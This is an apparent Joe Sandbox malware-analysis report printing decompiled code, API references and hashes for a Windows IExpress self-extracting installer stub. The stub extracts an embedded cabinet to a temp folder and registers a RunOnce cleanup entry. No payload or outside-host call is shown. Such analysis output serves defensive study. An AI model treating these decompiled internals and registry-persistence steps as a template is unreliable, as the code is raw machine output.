0x0108221d
0x0108221d
0x01082220
0x01082220
0x01082222
0x01082223
0x01082229
0x0108223d
0x01082249
0x01082250
0x00000000
0x01082250
0x010821d2
0x010821d9
0x00000000
0x010821d9
0x0108213a
0x01082141
0x01082144
0x0108214c
0x00000000
0x00000000
0x01082163
0x01082172
0x01082172
0x00000000
0x01082163
0x010820ea
0x010820f0
0x00000000

APIs

memset.MSVCRT ref: 01082050
memset.MSVCRT ref: 0108205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0108208C

Part of subcall function 0108171E: _vsnprintf.MSVCRT ref: 01081750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010820C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010820EA
GetSystemDirectoryA.KERNEL32 ref: 01082103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01082122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01082134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01082144
GetSystemDirectoryA.KERNEL32 ref: 0108215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0108218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010821C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010821E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0108223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01082249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01082250

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010821F6
%s /D:%s, xrefs: 010821FF, 01082210
wextract_cleanup%d, xrefs: 0108209E
advpack.dll, xrefs: 01082109
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01082082
wextract_cleanup1, xrefs: 010820A5, 010820BE, 010820F0, 01082232
DelNodeRunDLL32, xrefs: 0108212E
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010821A8, 01082204

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-3073904943
Opcode ID: b332a0a8040465870ffca9953f770dafccaa24fdcc84c4282a2f35572f85a5a2
Instruction ID: e5b6c7f2e049955e1cdb8c6815f84bb366bd3219b92e645fafe15a558ce5c212
Opcode Fuzzy Hash: b332a0a8040465870ffca9953f770dafccaa24fdcc84c4282a2f35572f85a5a2
Instruction Fuzzy Hash: C7510275A08214ABDB30BA64DC48FEF7B6CEB50700F1041AAFAC5A7145DA769986CF60

Uniqueness

Uniqueness Score: -1.00%

Function 010855A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E010855A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t28 ^ _t110;
				_t2 = E0108468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0108468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x1089a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x1088b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x1088a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E01086517(_t82, 0x7d2, 0, E01083210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x1089a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x10891e4;
									_t40 = GetTempPathA(0x104, 0x10891e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E01081781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E01086952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0108597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E01082630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0108658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x10891e4;
																					E01081781(0x10891e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E01085467(0x10891e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E01082630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0108597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E01085467(0x10891e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x10891e4;
											_t70 = E01082630(0, 0x10891e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x10891e4;
												_t71 = E01085467(0x10891e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0108597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x1088b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E01085467(0x1088b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E010844B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E010844B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x1089124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E010844B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x1089124 = E01086285();
					L2:
					_t38 = 0;
				}
				L47:
				return E01086CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x010855ab
0x010855b2
0x010855c9
0x010855d5
0x010855d9
0x01085600
0x01085605
0x0108560a
0x0108560c
0x01085638
0x01085641
0x01085643
0x01085645
0x01085645
0x0108564c
0x01085652
0x01085657
0x01085659
0x01085696
0x0108569c
0x0108589f
0x010858a7
0x010858ac
0x010858b3
0x010858b5
0x010856a2
0x010856a2
0x010856a8
0x00000000
0x010856ae
0x010856ae
0x010856b9
0x010856bf
0x010856c1
0x010856f3
0x010856f3
0x01085705
0x0108570a
0x01085711
0x01085717
0x01085724
0x01085726
0x01085729
0x01085730
0x01085737
0x0108573d
0x01085740
0x00000000
0x00000000
0x00000000
0x00000000
0x0108572b
0x0108572b
0x0108572e
0x01085742
0x01085742
0x01085745
0x0108576b
0x0108576b
0x00000000
0x01085747
0x01085747
0x0108574d
0x0108574f
0x01085771
0x01085771
0x01085773
0x00000000
0x01085751
0x01085751
0x01085753
0x00000000
0x01085755
0x0108575b
0x01085760
0x01085762
0x00000000
0x01085764
0x01085764
0x01085769
0x0108577e
0x0108577e
0x01085781
0x01085788
0x0108578d
0x0108578f
0x010857b2
0x010857b8
0x010857bd
0x010857bf
0x010857cd
0x010857cd
0x010857dd
0x010857e3
0x010857ef
0x010857f5
0x010857f8
0x0108580a
0x0108580a
0x010857fa
0x01085802
0x01085802
0x0108580d
0x0108580f
0x01085830
0x01085836
0x0108583d
0x0108584b
0x01085851
0x01085855
0x0108585a
0x0108585c
0x00000000
0x0108585e
0x0108585e
0x00000000
0x0108585e
0x01085811
0x01085817
0x01085819
0x0108581f
0x00000000
0x0108581f
0x01085791
0x01085797
0x0108579c
0x0108579e
0x00000000
0x010857a0
0x010857a9
0x010857ae
0x010857b0
0x00000000
0x00000000
0x00000000
0x00000000
0x010857b0
0x0108579e
0x00000000
0x00000000
0x00000000
0x01085769
0x01085762
0x01085753
0x0108574f
0x00000000
0x00000000
0x00000000
0x0108572e
0x00000000
0x01085864
0x01085864
0x01085864
0x01085717
0x00000000
0x010856c3
0x010856c5
0x010856c9
0x010856ce
0x010856d0
0x00000000
0x010856d6
0x010856d6
0x010856d8
0x010856dd
0x010856df
0x00000000
0x010856e1
0x010856e2
0x010856e4
0x010856e6
0x010856eb
0x010856ed
0x00000000
0x010856f3
0x010856f3
0x00000000
0x0108586c
0x01085878
0x0108587e
0x01085882
0x01085883
0x01085889
0x0108588e
0x0108588e
0x00000000
0x01085896
0x010856ed
0x010856df
0x010856d0
0x010856c1
0x010856a8
0x0108565b
0x0108565b
0x0108565d
0x01085669
0x01085669
0x0108565f
0x0108565f
0x01085665
0x01085667
0x00000000
0x00000000
0x01085667
0x0108566c
0x01085673
0x01085678
0x0108567a
0x0108589b
0x0108589b
0x01085680
0x01085685
0x0108568c
0x00000000
0x0108568c
0x0108567a
0x0108560e
0x01085613
0x0108561a
0x01085620
0x01085626
0x00000000
0x01085626
0x010855db
0x010855e0
0x010855e7
0x010855f1
0x010855f6
0x010855f6
0x010855f6
0x010858b7
0x010858c7

APIs

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010855CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 01085638
LocalFree.KERNEL32(00000000), ref: 0108564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01085620

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Part of subcall function 01086285: GetLastError.KERNEL32(01085BBC), ref: 01086285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010856B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0108571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 01085737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010857CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010857EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 01085802

Part of subcall function 01082630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 01082654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 01085830

Part of subcall function 01086517: FindResourceA.KERNEL32(01080000,000007D6,00000005), ref: 0108652A
Part of subcall function 01086517: LoadResource.KERNEL32(01080000,00000000,?,?,01082EE8,00000000,010819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01086538
Part of subcall function 01086517: DialogBoxIndirectParamA.USER32(01080000,00000000,00000547,010819E0,00000000), ref: 01086557
Part of subcall function 01086517: FreeResource.KERNEL32(00000000,?,?,01082EE8,00000000,010819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01086560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 01085878

Part of subcall function 0108597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010859A8
Part of subcall function 0108597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010859AF

Strings

msdownld.tmp, xrefs: 010857D3
RUNPROGRAM, xrefs: 010855BD, 01085600
<None>, xrefs: 01085632
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010856AE, 010856B3, 0108583D
Z, xrefs: 0108570A
A:\, xrefs: 010856F4

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-3498133043
Opcode ID: b2b7f9664d78c2fd9a4a05a4dfd6a446fe1a3ff57f8e6284d05180224814ca4b
Instruction ID: 1db3bf5c0b8d8435946dd32980ef5204bd767457353c80e62f3343390f895c70
Opcode Fuzzy Hash: b2b7f9664d78c2fd9a4a05a4dfd6a446fe1a3ff57f8e6284d05180224814ca4b
Instruction Fuzzy Hash: C3811770B0C2159AEB71BA789C84BFE76EDAF64304F0400E6E6C6E7181DF758D868B50

Uniqueness

Uniqueness Score: -1.00%

Function 0108597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0108597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x1089124 = E01086285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E010844B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x1089a34 & 0x00000008;
							if(( *0x1089a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x1089a38; // 0x0
								_t110 =  *((intOrPtr*)(0x10889e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x1089124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0108268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x1089a38; // 0x0
							_t110 =  *((intOrPtr*)(0x10889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10889e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x1089a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E010844B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x1089124 = E01086285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E010844B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x1089124 = E01086285();
					_t66 = 0;
					L33:
					return E01086CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0108597d
0x01085988
0x0108598f
0x0108599a
0x010859a6
0x010859a8
0x010859af
0x010859b9
0x010859dd
0x010859e4
0x010859f1
0x010859fe
0x01085a0b
0x01085a13
0x01085a19
0x01085a1b
0x01085ba1
0x01085baf
0x01085bbd
0x01085bd8
0x01085bde
0x01085be3
0x01085bec
0x01085bf0
0x01085bfc
0x01085c02
0x01085c02
0x01085c02
0x01085c04
0x01085c04
0x00000000
0x01085c04
0x01085a27
0x01085a3a
0x01085a46
0x01085a48
0x01085a4a
0x00000000
0x00000000
0x01085a64
0x01085a6a
0x01085a6c
0x01085abc
0x01085ac2
0x01085ac9
0x01085aca
0x01085aca
0x01085acc
0x01085acc
0x01085acf
0x01085ad1
0x00000000
0x00000000
0x01085ad3
0x01085ad6
0x01085ad8
0x00000000
0x00000000
0x01085ada
0x01085adc
0x01085add
0x01085add
0x01085ae0
0x00000000
0x00000000
0x00000000
0x01085ae0
0x01085ae2
0x01085ae4
0x01085ae6
0x01085ae6
0x01085ae6
0x01085ae9
0x01085aeb
0x01085af0
0x01085af6
0x01085af8
0x01085af9
0x01085af9
0x01085afb
0x00000000
0x00000000
0x01085afd
0x01085aff
0x01085b00
0x01085b03
0x00000000
0x00000000
0x00000000
0x01085b03
0x01085b05
0x01085b08
0x01085b20
0x01085b27
0x01085b52
0x01085b52
0x01085b5b
0x01085b62
0x01085b6b
0x01085b6d
0x01085b76
0x01085b7d
0x01085b83
0x01085b7f
0x01085b7f
0x01085b7f
0x01085b6f
0x01085b72
0x01085b72
0x01085b85
0x01085b98
0x01085b9e
0x01085b87
0x01085b8f
0x01085b8f
0x00000000
0x01085b85
0x01085b29
0x01085b33
0x00000000
0x00000000
0x01085b35
0x01085b48
0x01085b4a
0x00000000
0x01085b4a
0x01085b0f
0x01085b16
0x00000000
0x01085b16
0x01085a7c
0x01085a8a
0x01085aa5
0x01085aab
0x00000000
0x010859bb
0x010859c0
0x010859c7
0x010859d1
0x010859d6
0x01085c05
0x01085c14
0x01085c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010859A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 010859AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 01085A13
MulDiv.KERNEL32(?,?,00000400), ref: 01085A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01085A64
memset.MSVCRT ref: 01085A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01085A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 01085AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 01085BFC

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Part of subcall function 01086285: GetLastError.KERNEL32(01085BBC), ref: 01086285

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 60452630778f71e6266766410ae07224e3ab502c8f7aa999e0b6ffb55bd8c466
Instruction ID: d4f69c177a2213467e8389bb2358b50fd323997b84a194b320e01c43a9bd7fa3
Opcode Fuzzy Hash: 60452630778f71e6266766410ae07224e3ab502c8f7aa999e0b6ffb55bd8c466
Instruction Fuzzy Hash: DC71B5B1A0821C9FEB26EB64CC84BFE77ACEB48344F4440AAF5C5D3144DA358E458F60

Uniqueness

Uniqueness Score: -1.00%

Function 01084FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E01084FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x1089144 = E0108468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x1089140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x1088584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x1088584, 0x841), 5); // executed
				}
				_t10 = E01084EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E01084CA0, E01084CC0, E01084980, E01084A50, E01084AD0, E01084B60, E01084BC0, 1, 0x1089148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x1089148; // 0x0
						_t24 =  *0x1088584; // 0x0
						E010844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x1081140, 0, E01084CD0, 0, 0x1089140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x1088584; // 0x0
					E010844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x1089140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x1089140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x10891d8; // 0x0
						if(_t47 == 0) {
							E010844B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x1088a38 & 0x00000001) == 0 && ( *0x1089a34 & 0x00000001) == 0) {
						SendMessageA( *0x1088584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x01084fe0
0x01084fe6
0x01084ff9
0x0108500d
0x01085013
0x0108501a
0x01085163
0x01085163
0x01085020
0x01085027
0x01085037
0x01085051
0x01085051
0x01085057
0x0108505e
0x010850a7
0x010850ad
0x010850b4
0x010850e8
0x010850e8
0x010850ee
0x010850ff
0x01085104
0x01085106
